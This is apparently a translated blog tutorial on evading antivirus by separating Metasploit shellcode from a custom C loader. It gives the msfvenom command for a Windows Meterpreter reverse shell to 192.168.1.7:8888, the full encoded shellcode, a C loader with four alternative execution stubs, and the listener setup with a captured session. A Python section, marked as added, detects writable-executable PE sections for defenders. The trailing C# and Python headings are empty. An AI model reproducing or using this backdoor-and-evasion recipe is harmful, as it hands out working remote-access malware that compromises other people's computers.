Evading antivirus by separating the payload from the backdoor loader

As is well known, current antivirus products detect malware in three main ways: signature-based, behavior-based and cloud-based, and cloud detection can for the most part be summarized as signature matching as well. Whatever the product, it inspects the PE file, so the larger the backdoor binary is, the more easily it is detected.

Next we separate the shellcode from its executor (the loader) to evade detection.

Backdoor compiled with C

1. First, use the msfvenom command to generate a short piece of shellcode. Here the connect-back address is set to IP=192.168.1.7, PORT=8888. When the generation command runs it prints a block of hexadecimal text to the screen; that text is the encoded machine code. The parameters are explained after the output.

[root@localhost ~]# msfvenom -a x86 --platform Windows \
>                              -p windows/meterpreter/reverse_tcp \
>                              -b '\x00\x0b' LHOST=192.168.1.7 LPORT=8888 -f c
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of c file: 1571 bytes
unsigned char buf[] =
"\xd9\xc5\xd9\x74\x24\xf4\xba\x8b\xfc\x02\xdd\x5e\x2b\xc9\xb1"
"\x56\x83\xee\xfc\x31\x56\x14\x03\x56\x9f\x1e\xf7\x21\x77\x5c"
"\xf8\xd9\x87\x01\x70\x3c\xb6\x01\xe6\x34\xe8\xb1\x6c\x18\x04"
"\x39\x20\x89\x9f\x4f\xed\xbe\x28\xe5\xcb\xf1\xa9\x56\x2f\x93"
"\x29\xa5\x7c\x73\x10\x66\x71\x72\x55\x9b\x78\x26\x0e\xd7\x2f"
"\xd7\x3b\xad\xf3\x5c\x77\x23\x74\x80\xcf\x42\x55\x17\x44\x1d"
"\x75\x99\x89\x15\x3c\x81\xce\x10\xf6\x3a\x24\xee\x09\xeb\x75"
"\x0f\xa5\xd2\xba\xe2\xb7\x13\x7c\x1d\xc2\x6d\x7f\xa0\xd5\xa9"
"\x02\x7e\x53\x2a\xa4\xf5\xc3\x96\x55\xd9\x92\x5d\x59\x96\xd1"
"\x3a\x7d\x29\x35\x31\x79\xa2\xb8\x96\x08\xf0\x9e\x32\x51\xa2"
"\xbf\x63\x3f\x05\xbf\x74\xe0\xfa\x65\xfe\x0c\xee\x17\x5d\x58"
"\xc3\x15\x5e\x98\x4b\x2d\x2d\xaa\xd4\x85\xb9\x86\x9d\x03\x3d"
"\x9f\x8a\xb3\x91\x27\xda\x4d\x12\x57\xf2\x89\x46\x07\x6c\x3b"
"\xe7\xcc\x6c\xc4\x32\x78\x67\x52\x7d\xd4\x76\xa5\x15\x26\x79"
"\x8b\x5d\xaf\x9f\x9b\xcd\xff\x0f\x5c\xbe\xbf\xff\x34\xd4\x30"
"\xdf\x25\xd7\x9b\x48\xcf\x38\x75\x20\x78\xa0\xdc\xba\x19\x2d"
"\xcb\xc6\x1a\xa5\xf9\x37\xd4\x4e\x88\x2b\x01\x29\x72\xb4\xd2"
"\xdc\x72\xde\xd6\x76\x25\x76\xd5\xaf\x01\xd9\x26\x9a\x12\x1e"
"\xd8\x5b\x22\x54\xef\xc9\x0a\x02\x10\x1e\x8a\xd2\x46\x74\x8a"
"\xba\x3e\x2c\xd9\xdf\x40\xf9\x4e\x4c\xd5\x02\x26\x20\x7e\x6b"
"\xc4\x1f\x48\x34\x37\x4a\xca\x33\xc7\x08\xe5\x9b\xaf\xf2\xb5"
"\x1b\x2f\x99\x35\x4c\x47\x56\x19\x63\xa7\x97\xb0\x2c\xaf\x12"
"\x55\x9e\x4e\x22\x7c\x7e\xce\x23\x73\x5b\xe1\x5e\xfc\x5c\x02"
"\x9f\x14\x39\x03\x9f\x18\x3f\x38\x49\x21\x35\x7f\x49\x16\x46"
"\xca\xec\x3f\xcd\x34\xa2\x40\xc4";

-a              # specify the target architecture of the payload
--platform      # specify the target platform of the payload
-p, --payload   # specify the payload to use
-f, --format    # specify the output format (use --help-formats to list the formats msf supports)
-b '\x00\x0b'   # bad characters to avoid in the encoded output

2. Copy the shellcode output above, open the VS Express compiler, and write the following C code, which calls the shellcode through inline assembly.

#include <stdio.h>
#include <windows.h>

//#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")  // hide the console window
#pragma comment(linker,"/INCREMENTAL:NO")                                     // reduce the compiled size
#pragma comment(linker, "/section:.data,RWE")                                 // make the .data section readable, writable and executable, so the array below can run in place

unsigned char shellcode[] =
"\xd9\xc5\xd9\x74\x24\xf4\xba\x8b\xfc\x02\xdd\x5e\x2b\xc9\xb1"
"\x56\x83\xee\xfc\x31\x56\x14\x03\x56\x9f\x1e\xf7\x21\x77\x5c"
"\xf8\xd9\x87\x01\x70\x3c\xb6\x01\xe6\x34\xe8\xb1\x6c\x18\x04"
"\x39\x20\x89\x9f\x4f\xed\xbe\x28\xe5\xcb\xf1\xa9\x56\x2f\x93"
"\x29\xa5\x7c\x73\x10\x66\x71\x72\x55\x9b\x78\x26\x0e\xd7\x2f"
"\xd7\x3b\xad\xf3\x5c\x77\x23\x74\x80\xcf\x42\x55\x17\x44\x1d"
"\x75\x99\x89\x15\x3c\x81\xce\x10\xf6\x3a\x24\xee\x09\xeb\x75"
"\x0f\xa5\xd2\xba\xe2\xb7\x13\x7c\x1d\xc2\x6d\x7f\xa0\xd5\xa9"
"\x02\x7e\x53\x2a\xa4\xf5\xc3\x96\x55\xd9\x92\x5d\x59\x96\xd1"
"\x3a\x7d\x29\x35\x31\x79\xa2\xb8\x96\x08\xf0\x9e\x32\x51\xa2"
"\xbf\x63\x3f\x05\xbf\x74\xe0\xfa\x65\xfe\x0c\xee\x17\x5d\x58"
"\xc3\x15\x5e\x98\x4b\x2d\x2d\xaa\xd4\x85\xb9\x86\x9d\x03\x3d"
"\x9f\x8a\xb3\x91\x27\xda\x4d\x12\x57\xf2\x89\x46\x07\x6c\x3b"
"\xe7\xcc\x6c\xc4\x32\x78\x67\x52\x7d\xd4\x76\xa5\x15\x26\x79"
"\x8b\x5d\xaf\x9f\x9b\xcd\xff\x0f\x5c\xbe\xbf\xff\x34\xd4\x30"
"\xdf\x25\xd7\x9b\x48\xcf\x38\x75\x20\x78\xa0\xdc\xba\x19\x2d"
"\xcb\xc6\x1a\xa5\xf9\x37\xd4\x4e\x88\x2b\x01\x29\x72\xb4\xd2"
"\xdc\x72\xde\xd6\x76\x25\x76\xd5\xaf\x01\xd9\x26\x9a\x12\x1e"
"\xd8\x5b\x22\x54\xef\xc9\x0a\x02\x10\x1e\x8a\xd2\x46\x74\x8a"
"\xba\x3e\x2c\xd9\xdf\x40\xf9\x4e\x4c\xd5\x02\x26\x20\x7e\x6b"
"\xc4\x1f\x48\x34\x37\x4a\xca\x33\xc7\x08\xe5\x9b\xaf\xf2\xb5"
"\x1b\x2f\x99\x35\x4c\x47\x56\x19\x63\xa7\x97\xb0\x2c\xaf\x12"
"\x55\x9e\x4e\x22\x7c\x7e\xce\x23\x73\x5b\xe1\x5e\xfc\x5c\x02"
"\x9f\x14\x39\x03\x9f\x18\x3f\x38\x49\x21\x35\x7f\x49\x16\x46"
"\xca\xec\x3f\xcd\x34\xa2\x40\xc4";

// MSVC inline assembly is only available in 32-bit (x86) builds, matching the -a x86 payload above
int main(int argc, char **argv)
{
    __asm
    {
        lea eax, shellcode   // load the address of the array
        call eax             // transfer control to it
    }
    return 0;
}

Besides the form above, here I have collected some other ways of calling the shellcode.

    // Method 1: cast the array to a function pointer and call it
    void RunShellCode_2()
    {
        ((void(*)(void))&shellcode)();
    }

    // Method 2: load the address and jump to it
    void RunShellCode_3()
    {
        __asm
        {
            lea eax, shellcode;
            jmp eax;
        }
    }

    // Method 3: same as method 2, using the offset form
    void RunShellCode_4()
    {
        __asm
        {
            mov eax, offset shellcode;
            jmp eax;
        }
    }

    // Method 4: emit the raw bytes FF E0, which encode jmp eax
    void RunShellCode_5()
    {
        __asm
        {
            mov eax, offset shellcode;
            _emit 0xFF;
            _emit 0xE0;
        }
    }
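Every loader variant above, the `main` with `call eax` as much as the four alternatives, depends on the same linker setting, `/section:.data,RWE`, and that setting leaves a recognizable trace in the compiled binary: a section header whose characteristics carry both IMAGE_SCN_MEM_WRITE and IMAGE_SCN_MEM_EXECUTE. A normal compiler never emits a writable, executable `.data` section, so a defender can flag such binaries without knowing anything about the payload inside. The Python below is an added example, not code from the original post: it parses the PE section table and reports writable+executable sections. The function names, the minimal PE builder and the two sample images (a normal layout and one with an RWE `.data`) are constructed here for illustration so the script runs offline.

```python
import struct

# Section characteristic flags from the PE/COFF specification
IMAGE_SCN_CNT_CODE             = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE          = 0x20000000
IMAGE_SCN_MEM_READ             = 0x40000000
IMAGE_SCN_MEM_WRITE            = 0x80000000


def parse_sections(pe: bytes):
    """Return [(name, characteristics), ...] from a PE image's section table.

    Raises ValueError on a malformed image instead of indexing past the buffer,
    so a truncated or hostile file cannot crash the scanner.
    """
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    # Need signature (4) + COFF header (20) to be inside the buffer
    if e_lfanew + 24 > len(pe) or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    (_machine, nsections, _ts, _psym, _nsym, opt_size, _chars) = \
        struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_size   # section table follows the optional header
    sections = []
    for i in range(nsections):
        off = table + 40 * i        # each IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(pe):
            raise ValueError("section table truncated")
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        characteristics = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append((name, characteristics))
    return sections


def find_writable_executable(pe: bytes):
    """Names of sections that are both writable and executable (the RWE trace)."""
    return [name for name, chars in parse_sections(pe)
            if chars & IMAGE_SCN_MEM_EXECUTE and chars & IMAGE_SCN_MEM_WRITE]


def build_test_pe(sections):
    """Constructed minimal PE: DOS header with e_lfanew, COFF header with an
    empty optional header, and one 40-byte section header per entry.
    Only the fields the parser reads are meaningful."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    table = b""
    for name, chars in sections:
        table += name.ljust(8, b"\0")[:8] + struct.pack(
            "<IIIIIIHHI", 0x1000, 0x1000, 0x200, 0x400, 0, 0, 0, 0, chars)
    return dos + b"PE\0\0" + coff + table


# Constructed sample images: what a default MSVC link produces, and what
# /section:.data,RWE produces (execute added to the data section).
NORMAL_PE = build_test_pe([
    (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])
RWE_PE = build_test_pe([
    (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ
               | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE),
])

if __name__ == "__main__":
    import sys
    # With a path argument, scan a real file; otherwise run on the samples.
    images = [("<normal sample>", NORMAL_PE), ("<RWE sample>", RWE_PE)]
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            images = [(sys.argv[1], f.read())]
    for label, image in images:
        hits = find_writable_executable(image)
        print(f"{label}: {'RWE sections: ' + ', '.join(hits) if hits else 'clean'}")
```

Run with no arguments to see the two samples classified, or pass a path to scan a real executable. The check is deliberately narrow: a writable+executable section is rare in legitimately linked binaries, so it is a low-noise indicator, but a loader that instead allocates executable memory at run time (for example through VirtualAlloc followed by VirtualProtect) will not carry this static trace and needs behavioral monitoring rather than header inspection.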

3. In the MSF console, start the listener.

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > show options

msf5 exploit(multi/handler) > set lhost 192.168.1.7
lhost => 192.168.1.7
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.7:8888

Run our compiled shellcode executable and you can see a shell connect back.

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.7:8888
[*] Sending stage (179779 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.7:8888 -> 192.168.1.2:36805) at 2019-03-20 00:03:41 -0400

meterpreter > sysinfo
Computer        : lyshark
OS              : Windows 10 (Build 19999).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

Backdoor compiled with C#

Backdoor compiled with Python


Source: www.cnblogs.com/LyShark/p/11331476.html